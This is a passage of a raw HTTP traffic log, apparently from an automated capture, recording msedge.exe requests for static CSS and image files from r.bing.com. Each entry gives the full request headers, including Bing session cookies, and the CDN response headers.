Last-Modified: Mon, 25 Sep 2023 22:08:11 GMT
ETag: 0x8DBBE13E88D4230
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 44b824a4-001e-00ef-5aac-2d15a4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=97211
Expires: Sun, 06 Oct 2024 19:05:40 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0976f0
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/2W6N7byXj1BspnYUZI2WP3l11J0.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/2W6N7byXj1BspnYUZI2WP3l11J0.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 465
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: RboUAZZdwxsCpfA+o/WMbw==
Last-Modified: Tue, 24 Sep 2024 05:44:19 GMT
ETag: 0x8DCDC5BEF4CC89D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d3d75e47-001e-0038-2fc3-14abc9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=158481
Expires: Mon, 07 Oct 2024 12:06:51 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f0978aa
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/B6jGHby7hXuEC7enS8xiNSUwqXw.png

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/B6jGHby7hXuEC7enS8xiNSUwqXw.png HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://r.bing.com/rp/icNDaHbrcaIFIZRVzDw7Mn4j_ws.br.css
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 10060
Content-Type: image/png
Content-MD5: NyL0K09FbOsKFVWkE+stgw==
Last-Modified: Tue, 24 Sep 2024 05:57:20 GMT
ETag: 0x8DCDC5DC0B634E9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8d818a43-101e-004a-1cc7-15daf7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=270238
Expires: Tue, 08 Oct 2024 19:09:28 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f097ab8
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/g2mFaePdYzQOubI8JEItbebrED8.gz.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/g2mFaePdYzQOubI8JEItbebrED8.gz.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 389
Content-Type: text/css
Content-Encoding: gzip
Content-MD5: 3/vZUXOW4wNHGLr6SU0xpQ==
Last-Modified: Tue, 24 Sep 2024 06:46:44 GMT
ETag: 0x8DCDC64A792B513
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 235ef5a5-e01e-0076-7692-156e2c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=247593
Expires: Tue, 08 Oct 2024 12:52:06 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f097cfa
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/XR_FNBb3zsca2UvXLDaXw6zHvY8.gz.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/XR_FNBb3zsca2UvXLDaXw6zHvY8.gz.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 538
Content-Type: text/css
Content-Encoding: gzip
Content-MD5: VmJS6vBDeh5/XcJs3RmqDw==
Last-Modified: Tue, 24 Sep 2024 06:32:27 GMT
ETag: 0x8DCDC62A8AEB6C4
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b13c8f02-501e-0046-05ff-153406000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=293954
Expires: Wed, 09 Oct 2024 01:44:47 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f09941b
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 671
Content-Type: image/svg+xml
Content-MD5: 2e0aQjQvN2lVcUGQcPjoGA==
Last-Modified: Wed, 17 Aug 2022 06:27:13 GMT
ETag: 0x8DA801986136A14
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 127e18c8-e01e-0046-7875-ac302b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=83134
Expires: Sun, 06 Oct 2024 15:11:07 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f09951e
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 1111
Content-Type: image/svg+xml
Content-MD5: wEyINKyRgCGG5s5neuSonQ==
Last-Modified: Tue, 24 Sep 2024 06:17:16 GMT
ETag: 0x8DCDC6089E98574
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4a63813d-301e-0074-088f-166cd6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=355976
Expires: Wed, 09 Oct 2024 18:58:29 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f0999b8
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 4547
Content-Type: image/jpeg
Content-MD5: eu9Mz25HuboDg2XNPR9Wkw==
Last-Modified: Tue, 27 Dec 2022 02:26:51 GMT
ETag: 0x8DAE7B1D074EEF0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 07767630-001e-0079-32f5-2c1c75000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=102101
Expires: Sun, 06 Oct 2024 20:27:14 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099a91
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/d1CTdFN2PzYdPJfj02hT834p0CA.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/d1CTdFN2PzYdPJfj02hT834p0CA.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; 